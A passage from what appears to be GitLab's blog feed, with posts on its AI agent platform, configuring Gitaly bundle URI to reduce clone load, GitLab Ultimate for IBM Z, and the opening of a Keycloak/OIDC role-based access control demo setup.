<p>Building trust with AI agents isn't fundamentally different from building trust with new team members. You need to see their work, understand their approach, and gradually increase their responsibilities as they prove their competence.</p>
<p>That's the philosophy behind our agent approval workflow. Before any agent makes changes to your code or environment, it will present you with a clear plan: what it understands about the issue, the approach it will take, and the specific actions it wants to perform. You’ll then get the opportunity to review, approve, or redirect as needed. Over time, as agents consistently deliver quality work, you will be able to grant them greater autonomy for routine tasks while maintaining oversight for complex or critical work.</p>
<h2>Built for community and customization</h2>
<p>GitLab has always thrived on community contributions, and this year marked a milestone with record-breaking customer contributions to our platform. Now we're extending that same collaborative energy to AI agents through our open framework approach.</p>
<p>GitLab Duo Agent Platform isn't just about the agents we build — it's about empowering you and the broader community to create specialized agents that solve your unique engineering challenges. Whether you need an agent that understands your specific coding standards, integrates with your custom toolchain, or handles domain-specific tasks, the platform will give you the building blocks to make it happen.</p>
<p>This community-driven model creates a virtuous cycle that leverages the strength of the GitLab community through global sharing, similar to our <a href="https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/">CI/CD Catalog</a>. Diverse real-world use cases drive innovation. Enterprise feedback ensures reliability and security. And shared solutions benefit everyone. It's the same collaborative approach that has made GitLab successful, now applied to the frontier of agentic development.</p>
<h2>How to get started</h2>
<p>If you've been experimenting with <a href="https://about.gitlab.com/blog/gitlab-duo-chat-gets-agentic-ai-makeover/">GitLab Duo Agentic Chat</a>, now included with every GitLab 18 Premium and Ultimate GitLab.com user license, you've already gotten a taste of what's possible with AI agents in your development workflow.</p>
<p>To see what GitLab Duo Agent Platform can do and what we’re working on, check out the <a href="https://about.gitlab.com/eighteen/">demos in the recording of our annual GitLab 18 release event</a>.</p>
<p>Want to be among the first to experience it? Sign up for the GitLab <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">Duo Agent Platform beta waitlist</a>. This summer, we'll be opening access to more teams, with new agent features coming out in GitLab 18's upcoming releases throughout the year. We expect general availability this winter.</p>
<p><em>Disclaimer: This presentation contains information related to upcoming products, features, and functionality. It is important to note that the information in this presentation is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this presentation and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.</em></p>
<h2>Learn more</h2>
<ul>
<li><a href="https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/">From vibe coding to agentic AI: A roadmap for technical leaders</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/devops-automation-ai-agents/">DevOps automation and AI agents</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/ai-augmented-software-development/">AI-augmented software development: Agentic AI for DevOps</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/ai-code-analysis/">AI-driven code analysis: The new frontier in code security</a></li>
</ul>
]]></content>
        <author>
            <name>Bill Staples</name>
            <uri>https://about.gitlab.com/blog/authors/bill-staples</uri>
        </author>
        <published>2025-06-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Reduce the load on GitLab Gitaly with bundle URI]]></title>
        <id>https://about.gitlab.com/blog/reduce-the-load-on-gitlab-gitaly-with-bundle-uri/</id>
        <link href="https://about.gitlab.com/blog/reduce-the-load-on-gitlab-gitaly-with-bundle-uri/"/>
        <updated>2025-06-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Gitaly plays a vital role in the GitLab ecosystem — it is the server
component that handles all Git operations. Every push and pull made to/from
a repository is handled by Gitaly, which has direct access to the disk where
the actual repositories are stored. As a result, when Gitaly is under heavy
load, some operations like CI/CD pipelines and browsing a repository in the
GitLab UI can become quite slow. This is particularly true when serving
clones and fetches for large and busy monorepos, which can consume large
amounts of CPU and memory.</p>
<p><a href="https://docs.gitlab.com/administration/gitaly/bundle_uris/">Bundle URI</a> takes significant load off of Gitaly servers during clones by allowing Git to pre-download a bundled repository from object storage before calling the Gitaly servers to fetch the remaining objects.</p>
<p>Here is a graph that shows the difference between clones without and with bundle URI.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750705069/rvbm4ru1w58msd6zv4x7.png" alt="Graph that shows the difference between clones without and with bundle URI"></p>
<p>This graph shows the results of a small test we ran on an isolated GitLab installation, with Gitaly running on a machine with 2 CPUs. We wanted to test bundle URI with a large repository, so we pushed the <a href="https://gitlab.com/gitlab-org/gitlab">GitLab repository</a> to the instance. We also generated a bundle beforehand.</p>
<p>The big CPU spike is from when we performed a single clone of the GitLab repository with bundle URI disabled. It's quite noticeable. A little later, we turned on bundle URI and launched three concurrent clones of the GitLab repository. Sure enough, turning on bundle URI provides a massive performance gain. We can't even distinguish the CPU usage of the three clones from normal usage.</p>
<h2>Configure Gitaly to use bundle URI</h2>
<p>To enable bundle URI on your GitLab installation, there are a couple of things you need to configure.</p>
<h3>Create a cloud bucket</h3>
<p>Bundles need to be stored somewhere. The ideal place is in a cloud storage bucket. Gitaly uses the <a href="https://pkg.go.dev/gocloud.dev">gocloud.dev</a> library to read and write from cloud storage. Any cloud storage solution supported by this library can be used. Once you have a cloud bucket URL, you can add it in the Gitaly configuration here:</p>
<pre><code class="language-toml">[bundle_uri]
go_cloud_url = &quot;&lt;bucket-uri&gt;&quot;
</code></pre>
<p>Note that Gitaly does not manage the lifecycle of the bundles stored in the bucket. To avoid runaway storage costs, enable object lifecycle policies on the bucket to delete unused or old objects.</p>
<h3>Enable the feature flags</h3>
<p>There are two feature flags to enable:</p>
<ul>
<li>
<p><code>gitaly_bundle_generation</code> enables <a href="#auto-generated">auto-generation</a> of bundles.</p>
</li>
<li>
<p><code>gitaly_bundle_uri</code> makes Gitaly advertise bundle URIs when they are available (either manually created or auto-generated) and allows the user to <a href="#manual">manually</a> generate bundles.</p>
</li>
</ul>
<p>These feature flags can be enabled instance-wide or per repository. See the <a href="https://docs.gitlab.com/administration/feature_flags/#how-to-enable-and-disable-features-behind-flags">documentation on how to enable a GitLab feature behind a feature flag</a>.</p>
<h3>How to generate bundles</h3>
<p>Gitaly offers two ways for users to use bundle URI: a <a href="#manual">manual</a> way and an <a href="#auto-generated">auto-generated</a> way.</p>
<h4>Manual</h4>
<p>You can create a bundle manually by connecting over SSH to the Gitaly node that stores the repository you want to bundle, and running the following command:</p>
<pre><code class="language-shell">sudo -u git -- /opt/gitlab/embedded/bin/gitaly bundle-uri \
--config=&lt;config-file&gt; \
--storage=&lt;storage-name&gt; \
--repository=&lt;relative-path&gt;
</code></pre>
<p>This command creates a bundle for the given repository and stores it in the bucket configured above. When a subsequent <code>git clone</code> request reaches Gitaly for the same repository, the bundle URI mechanism described above comes into play.</p>
<h4>Auto-generated</h4>
<p>Gitaly can also generate bundles automatically, using a heuristic to determine if it is currently handling frequent clones for the same repository.</p>
<p>The current heuristic keeps track of the number of times a <code>git fetch</code> request is issued for each repository. If the number of requests reaches a certain <code>threshold</code> in a given time <code>interval</code>, a bundle is automatically generated. Gitaly also keeps track of the last time it generated a bundle for a repository. When a new bundle should be regenerated, based on the <code>threshold</code> and <code>interval</code>, Gitaly looks at the last time a bundle was generated for the given repository. It will only generate a new bundle if the existing bundle is older than some <code>maxBundleAge</code> configuration. The old bundle is overwritten. There can only be one bundle per repository in cloud storage.</p>
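<p>The heuristic can be sketched as follows. The parameter names mirror the description above, but the default values and the Python code itself are illustrative, not Gitaly's Go implementation:</p>

```python
# Sketch of the auto-generation decision for a single repository.
def should_generate_bundle(fetches_in_interval, last_bundle_age,
                           threshold=100, max_bundle_age=3600):
    """fetches_in_interval: fetches counted in the current interval.
    last_bundle_age: seconds since the bundle was written, or None."""
    if fetches_in_interval < threshold:
        return False  # the repository is not being cloned often enough
    if last_bundle_age is None:
        return True   # hot repository with no bundle yet
    # Only overwrite the single per-repository bundle once it is stale.
    return last_bundle_age > max_bundle_age

print(should_generate_bundle(150, None))   # -> True
print(should_generate_bundle(150, 120))    # -> False (existing bundle is fresh)
print(should_generate_bundle(150, 7200))   # -> True  (existing bundle is stale)
```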
<h2>Using bundle URI</h2>
<p>When a bundle exists for a repository, it can be used by the <code>git clone</code> command.</p>
<h3>Cloning from your terminal</h3>
<p>To clone a repository from your terminal, make sure your Git configuration enables bundle URI. The configuration can be set like so:</p>
<pre><code class="language-shell">git config --global transfer.bundleuri true
</code></pre>
<p>To verify that bundle URI is used during a clone, you can run the <code>git clone</code> command with <code>GIT_TRACE=1</code> and see if your bundle is being downloaded:</p>
<pre><code class="language-shell">➜  GIT_TRACE=1 git clone https://gitlab.com/gitlab-org/gitaly
...
14:31:42.374912 run-command.c:667       trace: run_command: git-remote-https '&lt;bundle-uri&gt;'
...
</code></pre>
<h3>Cloning during CI/CD pipelines</h3>
<p>One scenario where using bundle URI would be beneficial is during a CI/CD pipeline, where each job needs a copy of the repository in order to run. Cloning a repository during a CI/CD pipeline is the same as cloning a repository from your terminal, except that the Git client in this case is the GitLab Runner. Thus, we need to configure the GitLab Runner in such a way that it can use bundle URI.</p>
<p><strong>1. Update the helper-image</strong></p>
<p>The first thing to do to configure the GitLab Runner is to <a href="https://docs.gitlab.com/runner/configuration/advanced-configuration/#override-the-helper-image">overwrite the helper-image</a> that your GitLab Runner instances use. The <code>helper-image</code> is the image that is used to run the process of cloning a repository before the job starts. To use bundle URI, the image needs the following:</p>
<ul>
<li>
<p>Git Version 2.49.0 or later</p>
</li>
<li>
<p><a href="https://gitlab.com/gitlab-org/gitlab-runner/-/tree/main/apps/gitlab-runner-helper?ref_type=heads"><code>GitLab Runner helper</code></a> Version 18.1.0 or later</p>
</li>
</ul>
<p>The helper-images can be found <a href="https://gitlab.com/gitlab-org/gitlab-runner/container_registry/1472754?orderBy=PUBLISHED_AT&amp;sort=desc&amp;search%5B%5D=v18.1.0">here</a>. Select an image that corresponds to the OS distribution and the architecture you use for your GitLab Runner instances, and verify that the image satisfies the requirements.</p>
<p>At the time of writing, the <code>alpine-edge-&lt;arch&gt;-v18.1.0*</code> tag meets all requirements.</p>
<p>You can validate that the image meets all requirements with:</p>
<pre><code class="language-shell">docker run -it &lt;image:tag&gt;
$ git version ## must be 2.49.0 or newer
$ gitlab-runner-helper -v ## must be 18.1.0 or newer
</code></pre>
<p>If you do not find an image that meets the requirements, you can also use the helper-image as a base image and install the requirements yourself in a custom-built image that you can host on <a href="https://docs.gitlab.com/user/packages/container_registry/">GitLab Container Registry</a>.</p>
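<p>A custom helper image might look like the following. Note that the base image tag below is an illustrative example; pick one that matches your runner's OS distribution and architecture, and verify the installed Git version satisfies the requirement:</p>
<pre><code class="language-dockerfile"># Illustrative Dockerfile for a custom helper image.
FROM registry.gitlab.com/gitlab-org/gitlab-runner/gitlab-runner-helper:alpine-edge-x86_64-v18.1.0

# Install a Git version from the distribution repositories that satisfies
# the bundle URI requirement (&gt;= 2.49.0).
RUN apk add --no-cache git
</code></pre>
<p>Push the resulting image to your container registry and reference it as the <code>helper_image</code> in the runner configuration below.</p>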
<p>Once you have found the image you need, you must configure your GitLab Runner instances to use it by updating your <code>config.toml</code> file:</p>
<pre><code class="language-toml">[[runners]]
 (...)
 executor = &quot;docker&quot;
 [runners.docker]
    (...)
    helper_image = &quot;image:tag&quot; ## &lt;-- put the image name and tag here
</code></pre>
<p>Once the configuration is changed, you must restart the runners for the new configuration to take effect.</p>
<p><strong>2. Turn on the feature flag</strong></p>
<p>Next, you must enable the <code>FF_USE_GIT_NATIVE_CLONE</code> <a href="https://docs.gitlab.com/runner/configuration/feature-flags/">GitLab Runner feature flag</a> in your <code>.gitlab-ci.yml</code> file. To do that, simply add it as a variable and set it to <code>true</code>:</p>
<pre><code class="language-yaml">variables:
  FF_USE_GIT_NATIVE_CLONE: &quot;true&quot;
</code></pre>
<p>The <code>GIT_STRATEGY</code> must also be <a href="https://docs.gitlab.com/ci/runners/configure_runners/#git-strategy">set to <code>clone</code></a>, as Git bundle URI only works with <code>clone</code> commands.</p>
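<p>Putting both settings together, the relevant part of your <code>.gitlab-ci.yml</code> file would look like this:</p>
<pre><code class="language-yaml">variables:
  FF_USE_GIT_NATIVE_CLONE: &quot;true&quot;
  GIT_STRATEGY: clone
</code></pre>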
<h2>How bundle URI works</h2>
<p>When a user clones a repository with the <code>git clone</code> command, a process called <a href="https://git-scm.com/docs/git-fetch-pack"><code>git-fetch-pack</code></a> is launched on the client's machine. This process communicates with the remote repository's server (over HTTP/S, SSH, etc.) and asks it to start a <a href="https://git-scm.com/docs/git-upload-pack"><code>git-upload-pack</code></a> process. Those two processes then exchange information using the Git protocol (note that bundle URI is only supported with <a href="https://git-scm.com/docs/protocol-v2">Git protocol v2</a>). The capabilities both processes support, and the references and objects the client needs, are among the information exchanged. Once the Git server has determined which objects to send to the client, it packages them into a packfile, which, depending on the size of the data, can consume a significant amount of resources.</p>
<p>Where does bundle URI fit into this interaction? If bundle URI is advertised as a capability from the <code>upload-pack</code> process and the client supports bundle URI, the Git client will ask the server if it knows about any bundle URIs. The server sends those URIs back and the client downloads those bundles.</p>
<p>Here is a diagram that shows those interactions:</p>
<pre><code class="language-mermaid">sequenceDiagram
    participant client as Client
    participant upload as Server
    participant cloud as File server

    client -&gt;&gt; upload: issue git-upload-pack
    upload --&gt;&gt; client: list of server capabilities
    opt if bundle URI is advertised as a capability
        client -&gt;&gt; upload: request bundle URI
        upload --&gt;&gt; client: bundle URI
        client -&gt;&gt; cloud: download bundle at URI
        cloud --&gt;&gt; client: bundle file
        client -&gt;&gt; client: clone from bundle
    end
    client -&gt;&gt; upload: requests missing references and objects
    upload --&gt;&gt; client: packfile data
</code></pre>
<p>As such, Git <a href="https://git-scm.com/docs/bundle-uri">bundle URI</a> is a mechanism by which, during a <code>git clone</code>, a Git server can advertise the URI of a bundle for the repository being cloned. The Git client can then clone the repository from the bundle and request from the Git server only the missing references and objects that were not part of the bundle. This mechanism significantly reduces the load on the Git server.</p>
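<p>You can observe the client side of this mechanism locally: a bundle is just a file containing refs and objects, and Git can clone from it directly. Here is a self-contained demonstration using a throwaway repository:</p>
<pre><code class="language-shell"># Create a throwaway repository with one commit.
git init -q demo
cd demo
git config user.email you@example.com
git config user.name you
touch README.md
git add README.md
git commit -qm init

# Package all refs and objects into a single bundle file.
git bundle create ../demo.bundle --all HEAD
cd ..

# A Git client can clone from the bundle directly, without contacting a server:
git clone -q demo.bundle demo-from-bundle
git -C demo-from-bundle log --oneline
</code></pre>
<p>With bundle URI, the server advertises where such a file lives; the client downloads it, clones from it, and then fetches only what the bundle is missing.</p>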
<h2>Alternatives</h2>
<p>GitLab also offers the <a href="https://docs.gitlab.com/administration/gitaly/configure_gitaly/#pack-objects-cache">Pack-objects cache</a> feature, which works slightly differently from bundle URI. When the server packs objects together into a so-called packfile, this feature keeps that file in a cache. When another client requests the same set of objects, the server doesn't need to repack them; it can simply send the same packfile again.</p>
<p>That feature is only beneficial when many clients request the exact same set of objects, so in a fast-changing repository it might not yield any improvement. With bundle URI, it doesn't matter if the bundle is slightly out of date, because the client can request the missing objects after downloading the bundle and apply those changes on top. Also, bundle URI in Gitaly stores the bundles on external storage, whereas the Pack-objects cache stores them on the Gitaly node, so using the latter doesn't reduce network and I/O load on the Gitaly server.</p>
<h2>Try bundle URI today</h2>
<p>You can try the bundle URI feature in one of the following ways:</p>
<ul>
<li>
<p>Download a <a href="https://about.gitlab.com/free-trial/">free, 60-day trial version of GitLab Ultimate</a>.</p>
</li>
<li>
<p>If you already run a self-hosted GitLab installation, upgrade to 18.1.</p>
</li>
<li>
<p>If you can't upgrade to 18.1 at this time, <a href="https://about.gitlab.com/install/">download GitLab</a> to a local machine.</p>
</li>
</ul>
]]></content>
        <author>
            <name>Olivier Campeau</name>
            <uri>https://about.gitlab.com/blog/authors/olivier-campeau</uri>
        </author>
        <published>2025-06-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Ultimate for IBM Z: Modern DevSecOps for mainframes]]></title>
        <id>https://about.gitlab.com/blog/gitlab-ultimate-for-ibm-z-modern-devsecops-for-mainframes/</id>
        <link href="https://about.gitlab.com/blog/gitlab-ultimate-for-ibm-z-modern-devsecops-for-mainframes/"/>
        <updated>2025-06-23T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab and IBM have partnered to solve a fundamental disconnect in enterprise development: enabling mainframe developers to work with the same modern tools, workflows, and collaboration features as their distributed counterparts. GitLab Ultimate for IBM Z, a GitLab-certified, integrated DevSecOps solution tailored for the mainframe environment, does just that — allowing organizations to modernize their mainframe development workflows by facilitating a seamless migration from outdated legacy library managers. With CI/CD pipelines running natively on IBM z/OS, customers experience accelerated innovation and reduced operational costs.</p>
<h2>Challenges of today's mainframe development</h2>
<p>Enterprise organizations that use IBM Z systems for mission-critical workloads face challenges that conventional DevSecOps tools aren’t equipped to address. Cloud-native teams benefit from modern <a href="https://about.gitlab.com/topics/ci-cd/">CI/CD</a> pipelines, collaborative development, and automated testing. In contrast, mainframe teams are often left behind — stuck with outdated tools that lead to costly inefficiencies and operational silos.</p>
<p>Teams often resort to workarounds, such as SSH connections and manual file transfers, which create security vulnerabilities and audit difficulties. When compliance requirements are stringent, these improvised solutions become unacceptable risks. Meanwhile, organizations maintain expensive parallel toolchains, with legacy mainframe development tools carrying premium licensing costs while delivering limited functionality compared to modern alternatives.</p>
<p>This fragmentation creates two problems: slower delivery cycles and difficulty attracting developers who expect modern development experiences.</p>
<blockquote>
<p><strong>&quot;GitLab Ultimate for IBM Z represents an important step in addressing a long-standing industry challenge. IDC research shows that mainframe developers often work with legacy tooling that contributes to delivery inefficiencies and makes it harder to attract new talent. With this offering, modern DevSecOps capabilities and unified workflows are brought directly to the mainframe. This empowers developers to work more collaboratively and efficiently, while helping organizations accelerate innovation and integrate mainframe development into broader digital transformation strategies.&quot;</strong> - Katie Norton, Research Manager, DevSecOps and Software Supply Chain Security at IDC</p>
</blockquote>
<h2>Unified development environments</h2>
<p>True modernization means more than just updating mainframe development. It means creating a unified platform where mainframe, cloud-native, web, and mobile development teams collaborate seamlessly.</p>
<p>GitLab Ultimate for IBM Z enables developers to use consistent workflows whether they're deploying to z/OS, cloud, or on-premises infrastructure — knowledge transfers between teams instead of staying siloed. Organizations can modernize incrementally without business disruption, as legacy systems continue operating while teams adopt modern practices at their own pace.</p>
<p>As organizations pursue hybrid cloud strategies, GitLab provides the foundation for applications that span mainframe and cloud-native environments.</p>
<h2>What is GitLab Ultimate for IBM Z?</h2>
<p>GitLab Ultimate for IBM Z delivers native z/OS Runner support, enabling seamless CI/CD pipeline execution directly on your mainframe infrastructure. This GitLab-certified solution helps eliminate the need for complex workarounds while maintaining the security and reliability your enterprise applications demand.</p>
<p>The combination of GitLab's comprehensive DevSecOps platform with IBM's deep mainframe expertise creates something unique in the market: a certified solution that provides a true bridge between enterprise legacy systems and cloud-native innovation.</p>
<h2>GitLab Ultimate for IBM Z capabilities</h2>
<p>GitLab Ultimate for IBM Z provides enterprise teams with the tools they need to modernize mainframe development while preserving critical business systems.</p>
<p><strong>Native z/OS Runner support</strong> helps eliminate security risks and scalability bottlenecks associated with remote connections, while accelerating delivery through CI/CD pipelines that execute directly where your mainframe code resides.</p>
<p><strong>Unified Source Code Management</strong> modernizes your toolchain by replacing expensive legacy library managers with GitLab's searchable, version-controlled repository system, helping reduce licensing costs and maintenance overhead.</p>
<p><strong>Seamless integration</strong> with IBM Developer for z/OS Enterprise Edition (IDzEE) delivers faster software releases through dependency-based builds, automated code scanning, and comprehensive debugging tools within familiar developer environments, enhancing both quality and security.</p>
<p><strong>End-to-end visibility</strong> across mainframe and distributed environments provides comprehensive project management from planning to production, enabling automated DevOps workflows that help retain talent through modern, next-generation development tools.</p>
<h2>Modernize your mainframe development environment today</h2>
<p>GitLab Ultimate for IBM Z is available now for organizations ready to transform their mainframe development experience. To learn more, visit the <a href="https://about.gitlab.com/partners/technology-partners/ibm/">GitLab and IBM partnership page</a>.</p>
]]></content>
        <author>
            <name>Mike Flouton</name>
            <uri>https://about.gitlab.com/blog/authors/mike-flouton</uri>
        </author>
        <author>
            <name>Andy Bradfield</name>
            <uri>https://about.gitlab.com/blog/authors/andy-bradfield</uri>
        </author>
        <published>2025-06-23T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Automating role-based access control (RBAC) at scale]]></title>
        <id>https://about.gitlab.com/blog/automating-role-based-access-control-rbac-at-scale/</id>
        <link href="https://about.gitlab.com/blog/automating-role-based-access-control-rbac-at-scale/"/>
        <updated>2025-06-20T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Security starts with structure. Building a scalable and secure development platform begins with getting the fundamentals right — especially role-based access control (RBAC).</p>
<p>To help our customers scale effectively, we developed the RBAC Accelerator — a modular, outcome-driven enablement program that supports large organizations in defining, enforcing, and scaling access policies across GitLab.</p>
<p>This foundation enables broader transformation. For example, the Secure SDLC Accelerator, built on top of the RBAC Accelerator, empowers customers to integrate compliance, security, and DevSecOps best practices into their workflows.</p>
<p>GitLab customer <a href="https://www.lelyna.com/us/">Lely</a>, a major Dutch manufacturer of agricultural machines and robots, used this approach to migrate to GitLab Dedicated. Lely automated user provisioning via Azure AD using OpenID Connect (OIDC), enforced <a href="https://about.gitlab.com/blog/the-ultimate-guide-to-least-privilege-access-with-gitlab/">least-privilege policies</a>, and created a scalable, reusable access model to support their future development initiatives.</p>
<p>In this guide, we’ll take you through a hands-on implementation example of GitLab + <a href="https://www.keycloak.org/">Keycloak</a> + OIDC, covering everything from running the setup in a Docker environment to automating role mapping, designing a scalable group hierarchy, and aligning GitLab access controls with organizational structure and compliance goals.</p>
<p>This is a local demo setup intended for proof-of-concept purposes only.</p>
<p>Whether you’re just starting out or optimizing at scale, this modular foundation ensures you’re not just securing access — you’re enabling everything that comes next.</p>
<h2>Getting started with access control planning</h2>
<p>Before implementing any tooling, it’s essential to understand your access landscape.</p>
<p>Consider:</p>
<ul>
<li>What GitLab resources need protection (projects, groups, environments)?</li>
<li>Who are your personas (Developers, Maintainers, Guests, etc.)?</li>
<li>What organizational units (departments, cost centers) should govern access?</li>
<li>How does your IdP structure (Keycloak) define users and roles?</li>
</ul>
<p>Use this stage to draft your:</p>
<ul>
<li>Access control matrix</li>
<li>GitLab group hierarchy (team- or product-based)</li>
<li>Least privilege policy assumptions</li>
</ul>
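<p>Your draft access-control matrix can be captured in a simple, reviewable format before any tooling is involved. A hypothetical sketch (all names are illustrative, not prescribed by GitLab or Keycloak):</p>
<pre><code class="language-yaml"># Hypothetical access-control matrix (illustrative names only)
teams:
  firmware-team:
    gitlab_group: root/firmware-team
    roles:
      developers:  { gitlab_role: Developer,  keycloak_role: firmware-developer }
      maintainers: { gitlab_role: Maintainer, keycloak_role: firmware-maintainer }
      reporters:   { gitlab_role: Reporter,   keycloak_role: firmware-reporter }
  hardware-team:
    gitlab_group: root/hardware-team
    roles:
      developers:  { gitlab_role: Developer,  keycloak_role: hardware-developer }
</code></pre>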
<p><strong>Sample group hierarchy</strong></p>
<pre><code class="language-mermaid">graph TD
    Root[&quot;Root (Root Group)&quot;]
    FirmwareTeam[&quot;Firmware-Team&quot;]
    FirmwareDevelopers[&quot;Developers (GitLab Developer Role)&quot;]
    FirmwareMaintainers[&quot;Maintainers (GitLab Maintainer Role)&quot;]
    FirmwareReporters[&quot;Reporters (GitLab Reporter Role)&quot;]
    HardwareTeam[&quot;Hardware-Team&quot;]
    HardwareDevelopers[&quot;Developers&quot;]
    SoftwareTeam[&quot;Software-Team&quot;]
    SoftwareDevelopers[&quot;Developers&quot;]
    SoftwareMaintainers[&quot;Maintainers&quot;]
    SoftwareReporters[&quot;Reporters&quot;]
    
    Root --&gt; FirmwareTeam
    Root --&gt; HardwareTeam
    Root --&gt; SoftwareTeam
    
    FirmwareTeam --&gt; FirmwareDevelopers
    FirmwareTeam --&gt; FirmwareMaintainers
    FirmwareTeam --&gt; FirmwareReporters
    
    HardwareTeam --&gt; HardwareDevelopers
    
    SoftwareTeam --&gt; SoftwareDevelopers
    SoftwareTeam --&gt; SoftwareMaintainers
    SoftwareTeam --&gt; SoftwareReporters
</code></pre>
<h2>Demo system setup: GitLab + Keycloak in a local Docker environment</h2>
<h3>Prerequisites</h3>
<ul>
<li>Docker, Docker Compose, OpenSSL</li>
<li>GitLab Version 17.7.3 and Keycloak Version 23.0.7 container images</li>
<li>Self-signed certificates</li>
</ul>
<h3>.env configuration</h3>
<p>The demo setup uses the following GitLab and Keycloak versions, ports, and secrets.</p>
<h4>GitLab configuration</h4>
<pre><code class="language-bash">GITLAB_VERSION=17.7.3-ee.0
GITLAB_EXTERNAL_URL=http://localhost:8081
GITLAB_SSH_PORT=8222
</code></pre>
<h4>Keycloak configuration</h4>
<pre><code class="language-bash">KEYCLOAK_VERSION=latest
KEYCLOAK_ADMIN=&lt;your-admin-username&gt;
KEYCLOAK_ADMIN_PASSWORD=&lt;your-admin-password&gt;
KEYCLOAK_HTTPS_PORT=8443
KEYCLOAK_CLIENT_SECRET=&lt;your-client-secret&gt;  # Get this from Keycloak after setup
</code></pre>
<h2>Generate SSL certificates</h2>
<p>To establish trust between GitLab and Keycloak, especially in a self-hosted Docker environment, we’ll need to generate self-signed SSL certificates. These certificates will enable encrypted HTTPS communication and ensure GitLab can securely talk to Keycloak during the OIDC authentication process.</p>
<p>For production environments, we recommend using certificates from a trusted Certificate Authority (CA), but for local testing and development, self-signed certificates are sufficient.</p>
<p>Follow these step-by-step instructions:</p>
<ol>
<li>Create a folder for the certificates.</li>
</ol>
<pre><code class="language-bash">mkdir -p certs
</code></pre>
<ol start="2">
<li>Generate a self-signed certificate with OpenSSL.</li>
</ol>
<pre><code class="language-bash">openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout certs/tls.key \
  -out certs/tls.crt \
  -subj &quot;/CN=keycloak&quot; \
  -addext &quot;subjectAltName=DNS:keycloak,DNS:localhost&quot;
</code></pre>
<ol start="3">
<li>Create a PKCS12 keystore for Keycloak.</li>
</ol>
<pre><code class="language-bash">openssl pkcs12 -export \
  -in certs/tls.crt \
  -inkey certs/tls.key \
  -out certs/keystore.p12 \
  -name keycloak \
  -password pass:password
</code></pre>
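<p>Optionally, you can confirm that the generated certificate carries the expected subject and alternative names before wiring it into the containers (this assumes the <code>certs/tls.crt</code> file from step 2; the <code>-ext</code> option requires OpenSSL 1.1.1 or later):</p>
<pre><code class="language-shell">openssl x509 -in certs/tls.crt -noout -subject -ext subjectAltName
</code></pre>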
<h2>Start the service using Docker compose</h2>
<p>Now that we have our certificates, we can stand up our local GitLab + Keycloak environment using Docker Compose:</p>
<pre><code class="language-yaml">version: '3.8'
services:
  gitlab:
    image: gitlab/gitlab-ee:${GITLAB_VERSION}
    container_name: gitlab
    restart: unless-stopped
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url '${GITLAB_EXTERNAL_URL:-http://localhost:8081}'
        gitlab_rails['gitlab_shell_ssh_port'] = ${GITLAB_SSH_PORT:-8222}
        gitlab_rails['display_initial_root_password'] = true

        # OAuth Configuration
        gitlab_rails['omniauth_enabled'] = true
        gitlab_rails['omniauth_allow_single_sign_on'] = ['openid_connect']
        gitlab_rails['omniauth_block_auto_created_users'] = false
        gitlab_rails['omniauth_providers'] = [
            {
                'name' =&gt; 'openid_connect',
                'label' =&gt; 'Keycloak',
                'args' =&gt; {
                    'name' =&gt; 'openid_connect',
                    'scope' =&gt; ['openid', 'profile', 'email'],
                    'response_type' =&gt; 'code',
                    'issuer' =&gt; 'https://localhost:8443/realms/GitLab',
                    'client_auth_method' =&gt; 'query',
                    'discovery' =&gt; false,
                    'uid_field' =&gt; 'preferred_username',
                    'pkce' =&gt; true,
                    'client_options' =&gt; {
                        'identifier' =&gt; 'gitlab',
                        'secret' =&gt; '${KEYCLOAK_CLIENT_SECRET}',
                        'redirect_uri' =&gt; '${GITLAB_EXTERNAL_URL:-http://localhost:8081}/users/auth/openid_connect/callback',
                        'authorization_endpoint' =&gt; 'https://localhost:8443/realms/GitLab/protocol/openid-connect/auth',
                        'token_endpoint' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/token',
                        'userinfo_endpoint' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/userinfo',
                        'jwks_uri' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/certs'
                    }
                }
            }
        ]
    volumes:
      - gl-config:/etc/gitlab
      - gl-data:/var/opt/gitlab
      - ./certs/tls.crt:/etc/gitlab/trusted-certs/keycloak.crt
    ports:
      - '${GITLAB_EXTERNAL_PORT:-8081}:8081'
      - '${GITLAB_SSH_PORT:-8222}:22'
    shm_size: '256m'

  keycloak:
    image: quay.io/keycloak/keycloak:${KEYCLOAK_VERSION}
    container_name: keycloak-server
    restart: unless-stopped
    command: [
      &quot;start-dev&quot;,
      &quot;--import-realm&quot;,
      &quot;--https-port=${KEYCLOAK_HTTPS_PORT}&quot;,
      &quot;--https-key-store-file=/etc/x509/https/keystore.p12&quot;,
      &quot;--https-key-store-password=password&quot;
    ]
    volumes:
      - ./data:/opt/keycloak/data/import
      - ./certs:/etc/x509/https
    environment:
      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN}
      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}
    ports:
      - &quot;${KEYCLOAK_HTTPS_PORT}:8443&quot;

volumes:
  gl-config:
  gl-data:
</code></pre>
<p>Run the following command and your GitLab + Keycloak environment will be up in minutes:</p>
<pre><code>docker-compose up -d
</code></pre>
<h2>Keycloak realm configuration</h2>
<p>Your Keycloak realm is automatically configured on startup as it's defined in the <code>docker-compose</code> file.</p>
<p>The realm configuration will include:</p>
<ul>
